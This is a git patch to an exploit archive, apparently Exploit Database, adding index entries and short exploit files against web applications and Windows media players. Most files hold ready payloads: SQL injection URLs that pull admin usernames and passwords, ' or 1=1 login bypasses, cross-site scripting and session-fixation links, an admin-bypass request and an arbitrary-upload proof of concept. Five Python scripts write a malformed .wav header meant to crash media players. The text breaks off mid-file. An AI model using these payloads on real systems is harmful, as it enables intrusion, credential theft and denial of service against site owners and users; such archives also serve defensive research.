From 06a026f6dd3c57b769911c2be355fec67e117040 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 26 Mar 2014 04:30:57 +0000 Subject: [PATCH] Updated 03_26_2014 --- files.csv | 23 +++++++++++++++++ platforms/asp/webapps/32485.txt | 7 +++++ platforms/asp/webapps/32498.txt | 7 +++++ platforms/asp/webapps/32500.txt | 9 +++++++ platforms/linux/dos/32452.txt | 20 +++++++++++++++ platforms/php/webapps/32479.txt | 14 ++++++++++ platforms/php/webapps/32486.txt | 7 +++++ platforms/php/webapps/32487.txt | 17 ++++++++++++ platforms/php/webapps/32488.txt | 11 ++++++++ platforms/php/webapps/32490.txt | 9 +++++++ platforms/php/webapps/32492.txt | 9 +++++++ platforms/php/webapps/32494.txt | 7 +++++ platforms/php/webapps/32495.txt | 9 +++++++ platforms/php/webapps/32496.txt | 9 +++++++ platforms/php/webapps/32497.txt | 7 +++++ platforms/php/webapps/32499.txt | 9 +++++++ platforms/windows/dos/32477.py | 40 +++++++++++++++++++++++++++++ platforms/windows/dos/32478.py | 40 +++++++++++++++++++++++++++++ platforms/windows/dos/32481.txt | 40 +++++++++++++++++++++++++++++ platforms/windows/dos/32482.py | 39 ++++++++++++++++++++++++++++ platforms/windows/dos/32483.py | 39 ++++++++++++++++++++++++++++ platforms/windows/remote/32489.txt | 11 ++++++++ platforms/windows/remote/32491.html | 7 +++++ platforms/windows/remote/32493.html | 11 ++++++++ 24 files changed, 401 insertions(+) create mode 100755 platforms/asp/webapps/32485.txt create mode 100755 platforms/asp/webapps/32498.txt create mode 100755 platforms/asp/webapps/32500.txt create mode 100755 platforms/linux/dos/32452.txt create mode 100755 platforms/php/webapps/32479.txt create mode 100755 platforms/php/webapps/32486.txt create mode 100755 platforms/php/webapps/32487.txt create mode 100755 platforms/php/webapps/32488.txt create mode 100755 platforms/php/webapps/32490.txt create mode 100755 platforms/php/webapps/32492.txt create mode 100755 platforms/php/webapps/32494.txt create mode 100755 platforms/php/webapps/32495.txt create mode 100755 platforms/php/webapps/32496.txt create mode 100755 platforms/php/webapps/32497.txt create mode 100755 platforms/php/webapps/32499.txt create mode 100755 platforms/windows/dos/32477.py create mode 100755 platforms/windows/dos/32478.py create mode 100755 platforms/windows/dos/32481.txt create mode 100755 platforms/windows/dos/32482.py create mode 100755 platforms/windows/dos/32483.py create mode 100755 platforms/windows/remote/32489.txt create mode 100755 platforms/windows/remote/32491.html create mode 100755 platforms/windows/remote/32493.html diff --git a/files.csv b/files.csv index eb8cc1d3b..96a88afdf 100755 --- a/files.csv +++ b/files.csv @@ -29217,6 +29217,7 @@ id,file,description,date,author,platform,type,port 32449,platforms/php/webapps/32449.txt,"H-Sphere WebShell 4.3.10 'actions.php' Multiple Cross Site Scripting Vulnerabilities",2008-10-01,C1c4Tr1Z,php,webapps,0 32450,platforms/php/webapps/32450.txt,"WikyBlog 1.7.1 Multiple Cross-Site Scripting Vulnerabilities",2008-10-01,"Omer Singer",php,webapps,0 32451,platforms/linux/dos/32451.txt,"Fedora 8/9 Linux Kernel 'utrace_control' NULL Pointer Dereference Denial of Service Vulnerability",2008-10-02,"Michael Simms",linux,dos,0 +32452,platforms/linux/dos/32452.txt,"Adobe Flash Player 9/10 - SWF Version Null Pointer Dereference Denial of Service Vulnerability",2008-10-02,"Matthew Dempsky",linux,dos,0 32453,platforms/php/webapps/32453.txt,"Dreamcost HostAdmin 3.1 'index.php' Cross-Site Scripting Vulnerability",2008-10-02,Am!r,php,webapps,0 32454,platforms/unix/dos/32454.xml,"libxml2 Denial of Service Vulnerability",2008-10-02,"Christian Weiske",unix,dos,0 32455,platforms/php/webapps/32455.pl,"Website Directory 'index.php' Cross-Site Scripting Vulnerability",2008-10-03,"Ghost Hacker",php,webapps,0 @@ -29240,3 +29241,25 @@ id,file,description,date,author,platform,type,port 32473,platforms/php/webapps/32473.txt,"'com_jeux' Joomla! Component 'id' Parameter SQL Injection Vulnerability",2008-10-11,H!tm@N,php,webapps,0 32474,platforms/php/webapps/32474.txt,"EEB-CMS 0.95 'index.php' Cross-Site Scripting Vulnerability",2008-10-11,d3v1l,php,webapps,0 32475,platforms/multiple/remote/32475.sql,"Oracle Database Server <= 11.1 'CREATE ANY DIRECTORY' Privilege Escalation Vulnerability",2008-10-13,"Paul M. Wright",multiple,remote,0 +32477,platforms/windows/dos/32477.py,"Windows Media Player 11.0.5721.5230 - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0 +32478,platforms/windows/dos/32478.py,"jetVideo 8.1.1 - Basic (.wav) Local Crash PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0 +32479,platforms/php/webapps/32479.txt,"BigDump 0.35b - Arbitrary Upload",2014-03-24,"felipe andrian",php,webapps,0 +32481,platforms/windows/dos/32481.txt,"Light Audio Player 1.0.14 - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0 +32482,platforms/windows/dos/32482.py,"GOM Media Player (GOMMP) 2.2.56.5183 - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0 +32483,platforms/windows/dos/32483.py,"GOM Video Converter 1.1.0.60 - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0 +32485,platforms/asp/webapps/32485.txt,"ASP Indir Iltaweb Alisveris Sistemi 'xurunler.asp' SQL Injection Vulnerability",2008-10-13,tRoot,asp,webapps,0 +32486,platforms/php/webapps/32486.txt,"Webscene eCommerce 'productlist.php' SQL Injection Vulnerability",2008-10-14,"Angela Chang",php,webapps,0 +32487,platforms/php/webapps/32487.txt,"Elxis CMS 2008.1 modules/mod_language.php Multiple Parameter XSS",2008-10-14,faithlove,php,webapps,0 +32488,platforms/php/webapps/32488.txt,"Elxis CMS 2008.1 PHPSESSID Variable Session Fixation",2008-10-14,faithlove,php,webapps,0 +32489,platforms/windows/remote/32489.txt,"Microsoft Outlook Web Access for Exchange Server 2003 'redir.asp' URI Redirection Vulnerability",2008-10-15,"Martin Suess",windows,remote,0 +32490,platforms/php/webapps/32490.txt,"SweetCMS 1.5.2 'index.php' SQL Injection Vulnerability",2008-10-14,Dapirates,php,webapps,0 +32491,platforms/windows/remote/32491.html,"Hummingbird HostExplorer 6.2/8.0 ActiveX Control 'PlainTextPassword()' Buffer Overflow Vulnerability",2008-10-16,"Thomas Pollet",windows,remote,0 +32492,platforms/php/webapps/32492.txt,"Habari 0.5.1 'habari_username' Parameter Cross-Site Scripting Vulnerability",2008-10-16,faithlove,php,webapps,0 +32493,platforms/windows/remote/32493.html,"Hummingbird Deployment Wizard 10 'DeployRun.dll' ActiveX Control Multiple Security Vulnerabilities",2008-10-17,shinnai,windows,remote,0 +32494,platforms/php/webapps/32494.txt,"FlashChat 'connection.php' Role Filter Security Bypass Vulnerability",2008-10-17,eLiSiA,php,webapps,0 +32495,platforms/php/webapps/32495.txt,"Jetbox CMS 2.1 admin/cms/images.php orderby Parameter SQL Injection",2008-10-20,"Omer Singer",php,webapps,0 +32496,platforms/php/webapps/32496.txt,"Jetbox CMS 2.1 admin/cms/nav.php nav_id Parameter SQL Injection",2008-10-20,"Omer Singer",php,webapps,0 +32497,platforms/php/webapps/32497.txt,"PHP-Nuke Sarkilar Module 'id' Parameter SQL Injection Vulnerability",2008-10-20,r45c4l,php,webapps,0 +32498,platforms/asp/webapps/32498.txt,"Dizi Portali 'diziler.asp' SQL Injection Vulnerability",2008-10-21,"CyberGrup Lojistik",asp,webapps,0 +32499,platforms/php/webapps/32499.txt,"phPhotoGallery 0.92 'index.php' SQL Injection Vulnerability",2008-10-21,KnocKout,php,webapps,0 +32500,platforms/asp/webapps/32500.txt,"Bahar Download Script 2.0 'aspkat.asp' SQL Injection Vulnerability",2008-10-21,"CyberGrup Lojistik",asp,webapps,0 diff --git a/platforms/asp/webapps/32485.txt b/platforms/asp/webapps/32485.txt new file mode 100755 index 000000000..67284b78d --- /dev/null +++ b/platforms/asp/webapps/32485.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/31740/info + +ASP Indir Iltaweb Alisveris Sistemi is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data. + +A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/urunler.asp?catno=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 from users \ No newline at end of file diff --git a/platforms/asp/webapps/32498.txt b/platforms/asp/webapps/32498.txt new file mode 100755 index 000000000..fac30d7dd --- /dev/null +++ b/platforms/asp/webapps/32498.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/31849/info + +Dizi Portali is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/path/diziler.asp?id=[Sql Injection] \ No newline at end of file diff --git a/platforms/asp/webapps/32500.txt b/platforms/asp/webapps/32500.txt new file mode 100755 index 000000000..e0db9a8dd --- /dev/null +++ b/platforms/asp/webapps/32500.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31852/info + +Bahar Download Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data. + +A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Bahar Download Script 2.0 is vulnerable; other versions may also be affected. + +http://www.example.com/path/aspkat.asp?kid=-2%20union%20select%200,kullanici,parola,3,4,5,6,7,8,9,10,11,12,13,14,15,16%20from%20admin%20where%20id=1 \ No newline at end of file diff --git a/platforms/linux/dos/32452.txt b/platforms/linux/dos/32452.txt new file mode 100755 index 000000000..e07128c78 --- /dev/null +++ b/platforms/linux/dos/32452.txt @@ -0,0 +1,20 @@ +source: http://www.securityfocus.com/bid/31537/info + +Adobe Flash Player Plugin is prone to a remote denial-of-service vulnerability. + +Successfully exploiting this issue will allow attackers to crash the browser that uses the plugin, denying service to legitimate users. + +The following versions of Flash Player Plugin are vulnerable: + +9.0.45.0 +9.0.112.0 +9.0.124.0 +10.0.12.10 + +UPDATE (March 11, 2009): Flash Player Plugin 10.0.22.87 is vulnerable. + +UPDATE (September 4, 2009): Mac OS X 10.6 reportedly ships with Flash Player 10.0.23.1, which will overwrite any installed version of Flash Player when Mac OS X is being installed. + +UPDATE (June 10, 2010): Flash Player 10.1.53.64 and 9.0.227.0 are available. + +http://www.exploit-db.com/sploits/32452.zip \ No newline at end of file diff --git a/platforms/php/webapps/32479.txt b/platforms/php/webapps/32479.txt new file mode 100755 index 000000000..2b6e5d82b --- /dev/null +++ b/platforms/php/webapps/32479.txt @@ -0,0 +1,14 @@ +[+] Arbitrary Upload on BigDump v0.35b +[+] Date: 23/03/2014 +[+] Risk: High +[+] Author: Felipe Andrian Peixoto +[+] Vendor Homepage: http://www.ozerov.de/bigdump/ +[+] Contact: felipe_andrian@hotmail.com +[+] Tested on: Windows 7 and Linux +[+] Vulnerable File: bigdump.php +[+] Version: v0.35b +[+] Exploit : http://host/bigdump.php?start= +[+] PoC: http://SERVER/bigdump.php?start= + +Note: allows upload files and shells with tamperdate. + diff --git a/platforms/php/webapps/32486.txt b/platforms/php/webapps/32486.txt new file mode 100755 index 000000000..5cf53ad8d --- /dev/null +++ b/platforms/php/webapps/32486.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/31755/info + +Webscene eCommerce is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data. + +A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/productlist.php?categoryid=20&level=-4 union select concat(loginid,0x2f,password) from adminuser-- \ No newline at end of file diff --git a/platforms/php/webapps/32487.txt b/platforms/php/webapps/32487.txt new file mode 100755 index 000000000..1982a6331 --- /dev/null +++ b/platforms/php/webapps/32487.txt @@ -0,0 +1,17 @@ +source: http://www.securityfocus.com/bid/31764/info + +Elxis CMS is prone to multiple cross-site scripting and session-fixation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The application is also prone to a session-fixation vulnerability. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Using the session-fixation issue, the attacker can hijack the session and gain unauthorized access to the affected application. + +Elxis CMS 2006.1 is vulnerable; other versions may also be affected. + +http://www.example.net/index.php?>"> +http://www.example.net/index.php?option=>"> +http://www.example.net/index.php?option=com_poll&Itemid=>"> +http://www.example.net/index.php?option=com_poll&task=view&id=>"> +http://www.example.net/index.php?option=com_poll&Itemid=1&task=>"> +http://www.example.net/index.php?option=com_poll&task=view&bid=>"> +http://www.example.net/index.php?option=com_poll&Itemid=1&task=view&contact_id=>"> \ No newline at end of file diff --git a/platforms/php/webapps/32488.txt b/platforms/php/webapps/32488.txt new file mode 100755 index 000000000..25f32212c --- /dev/null +++ b/platforms/php/webapps/32488.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/31764/info + +Elxis CMS is prone to multiple cross-site scripting and session-fixation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The application is also prone to a session-fixation vulnerability. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Using the session-fixation issue, the attacker can hijack the session and gain unauthorized access to the affected application. + +Elxis CMS 2006.1 is vulnerable; other versions may also be affected. + +http://www.site.com/?PHPSESSID=[session_fixation] \ No newline at end of file diff --git a/platforms/php/webapps/32490.txt b/platforms/php/webapps/32490.txt new file mode 100755 index 000000000..573ec58be --- /dev/null +++ b/platforms/php/webapps/32490.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31774/info + +SweetCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data. + +A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +SweetCMS 1.5.2 is vulnerable; other versions may also be affected. + +http://www.example.com/index.php?page=3+AND+1=2+UNION+SELECT+0,concat(email,0x3a,password),2,3,4,5+from+users+limit+1,1-- \ No newline at end of file diff --git a/platforms/php/webapps/32492.txt b/platforms/php/webapps/32492.txt new file mode 100755 index 000000000..aed1b0508 --- /dev/null +++ b/platforms/php/webapps/32492.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31794/info + +Habari is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Habari 0.5.1 is affected; other versions may be vulnerable as well. + +http://www.example.com/user/login/?habari_username=>"> \ No newline at end of file diff --git a/platforms/php/webapps/32494.txt b/platforms/php/webapps/32494.txt new file mode 100755 index 000000000..4322ac55d --- /dev/null +++ b/platforms/php/webapps/32494.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/31800/info + +FlashChat is prone to a security-bypass vulnerability. + +An attacker can leverage this vulnerability to bypass certain security restrictions and gain unauthorized administrative access to the affected application. + +sendAndLoad=%5Btype%20Function%5D&s=7&t=&r=0&u=5581&b=3&c=banu&cid=1&id= \ No newline at end of file diff --git a/platforms/php/webapps/32495.txt b/platforms/php/webapps/32495.txt new file mode 100755 index 000000000..c5c5d2e0f --- /dev/null +++ b/platforms/php/webapps/32495.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31824/info + +Jetbox CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Jetbox CMS 2.1 is vulnerable; other versions may also be affected. + +http://www.example.com/admin/cms/images.php?orderby=[INJECTION POINT] \ No newline at end of file diff --git a/platforms/php/webapps/32496.txt b/platforms/php/webapps/32496.txt new file mode 100755 index 000000000..0e6d05845 --- /dev/null +++ b/platforms/php/webapps/32496.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31824/info + +Jetbox CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Jetbox CMS 2.1 is vulnerable; other versions may also be affected. + +http://www.example.com/path/admin/cms/nav.php?task=editrecord&nav_id=[INJECTION POINT] \ No newline at end of file diff --git a/platforms/php/webapps/32497.txt b/platforms/php/webapps/32497.txt new file mode 100755 index 000000000..5d36a743a --- /dev/null +++ b/platforms/php/webapps/32497.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/31830/info + +Sarkilar module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/modules.php?name=Sarkilar&op=showcontent&id=-1+union+select+null,null,pwd,email,user_uid,null,null,null,null+from+hebuname_authors-- \ No newline at end of file diff --git a/platforms/php/webapps/32499.txt b/platforms/php/webapps/32499.txt new file mode 100755 index 000000000..ed3926bd6 --- /dev/null +++ b/platforms/php/webapps/32499.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31850/info + +phPhotoGallery is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +phPhotoGallery 0.92 is affected; other versions may also be vulnerable. + +Username : ' or 1=1/*Password : ' or 1=1/* \ No newline at end of file diff --git a/platforms/windows/dos/32477.py b/platforms/windows/dos/32477.py new file mode 100755 index 000000000..1a1ce19ab --- /dev/null +++ b/platforms/windows/dos/32477.py @@ -0,0 +1,40 @@ +#!/usr/bin/python + +#[+] Author: TUNISIAN CYBER +#[+] Exploit Title: Windows Media Player 11.0.5721.5230 Memory Corruption PoC +#[+] Date: 22-03-2014 +#[+] Category: DoS/PoC +#[+] Tested on: WinXp/Windows 7 Pro +#[+] Vendor: http://windows.microsoft.com/fr-FR/windows/windows-media-player +#[+] Friendly Sites: na3il.com,th3-creative.com +#[+] Twitter: @TCYB3R + +import os +os.system("color 02") + +print"###########################################################" +print"# Title: WMP 11.0.5721.5230 Memory Corruption PoC #" +print"# Author: TUNISIAN CYBER #" +print"# Category: DoS/PoC # " +print"###########################################################" + +header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01" +"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E" +"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22" +"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00") + +filename = "ms.wav" +file = open(filename , "w") +file.write(header) +print "\n Files Created!\n" +file.close() \ No newline at end of file diff --git a/platforms/windows/dos/32478.py b/platforms/windows/dos/32478.py new file mode 100755 index 000000000..d421de2f0 --- /dev/null +++ b/platforms/windows/dos/32478.py @@ -0,0 +1,40 @@ +#!/usr/bin/python + +#[+] Author: TUNISIAN CYBER +#[+] Exploit Title: jetVideo 8.1.1 Basic (.wav) Local Crash PoC +#[+] Date: 22-03-2014 +#[+] Category: DoS/PoC +#[+] Tested on: WinXp/Windows 7 Pro +#[+] Vendor: http://www.jetaudio.com/download/jetvideo.html +#[+] Friendly Sites: na3il.com,th3-creative.com +#[+] Twitter: @TCYB3R + +import os +os.system("color 02") + +print"###########################################################" +print"# Title: Light jetVideo 8.1.1 Basic (.wav) Local Crash PoC#" +print"# Author: TUNISIAN CYBER #" +print"# Category: DoS/PoC # " +print"###########################################################" + +header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01" +"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E" +"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22" +"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00") + +filename = "jet.wav" +file = open(filename , "w") +file.write(header) +print "\n Files Created!\n" +file.close() \ No newline at end of file diff --git a/platforms/windows/dos/32481.txt b/platforms/windows/dos/32481.txt new file mode 100755 index 000000000..b85f52ae2 --- /dev/null +++ b/platforms/windows/dos/32481.txt @@ -0,0 +1,40 @@ +#!/usr/bin/python + +#[+] Author: TUNISIAN CYBER +#[+] Exploit Title: Light Audio Player 1.0.14 Memory Corruption PoC +#[+] Date: 22-03-2014 +#[+] Category: DoS/PoC +#[+] Tested on: WinXp/Windows 7 Pro +#[+] Vendor: http://download.cnet.com/Light-Audio-Player/3000-2139_4-10791618.html +#[+] Friendly Sites: na3il.com,th3-creative.com +#[+] Twitter: @TCYB3R + +import os +os.system("color 02") + +print"###########################################################" +print"# Title: Light Audio Player 1.0.14 Memory Corruption PoC #" +print"# Author: TUNISIAN CYBER #" +print"# Category: DoS/PoC # " +print"###########################################################" + +header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01" +"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E" +"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22" +"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00") + +filename = "3vil.wav" +file = open(filename , "w") +file.write(header) +print "\n Files Created!\n" +file.close() \ No newline at end of file diff --git a/platforms/windows/dos/32482.py b/platforms/windows/dos/32482.py new file mode 100755 index 000000000..e4e12a8a3 --- /dev/null +++ b/platforms/windows/dos/32482.py @@ -0,0 +1,39 @@ +#!/usr/bin/python + +#[+] Author: TUNISIAN CYBER +#[+] Exploit Title: GOMMP 2.2.56.5183 Memory Corruption PoC +#[+] Date: 22-03-2014 +#[+] Category: DoS/PoC +#[+] Tested on: WinXp/Windows 7 Pro +#[+] Vendor: http://player.gomlab.com/eng/ +#[+] Friendly Sites: na3il.com,th3-creative.com +#[+] Twitter: @TCYB3R + + +print"###########################################################" +print"# Title: GOMMP 2.2.56.5183 Memory Corruption PoC #" +print"# Author: TUNISIAN CYBER #" +print"# Category: DoS/PoC # " +print"###########################################################" + + +header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01" +"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E" +"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22" +"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00") + +filename = "3vil.wav" +file = open(filename , "w") +file.write(header) +print "\n Done!\n" +file.close() \ No newline at end of file diff --git a/platforms/windows/dos/32483.py b/platforms/windows/dos/32483.py new file mode 100755 index 000000000..378352a3b --- /dev/null +++ b/platforms/windows/dos/32483.py @@ -0,0 +1,39 @@ +#!/usr/bin/python + +#[+] Author: TUNISIAN CYBER +#[+] Exploit Title: GOM Video Converter 1.1.0.60 Memory Corruption PoC +#[+] Date: 22-03-2014 +#[+] Category: DoS/PoC +#[+] Tested on: WinXp/Windows 7 Pro +#[+] Vendor: http://converter.gomlab.com/ +#[+] Friendly Sites: na3il.com,th3-creative.com +#[+] Twitter: @TCYB3R + + +print"###########################################################" +print"# Title: GOMVC 1.1.0.60 Memory Corruption PoC #" +print"# Author: TUNISIAN CYBER #" +print"# Category: DoS/PoC # " +print"###########################################################" + + +header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01" +"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E" +"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22" +"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00") + +filename = "3vil.wav" +file = open(filename , "w") +file.write(header) +print "\n Done!\n" +file.close() \ No newline at end of file diff --git a/platforms/windows/remote/32489.txt b/platforms/windows/remote/32489.txt new file mode 100755 index 000000000..1c6ead316 --- /dev/null +++ b/platforms/windows/remote/32489.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/31765/info + +Outlook Web Access is prone to a remote URI-redirection 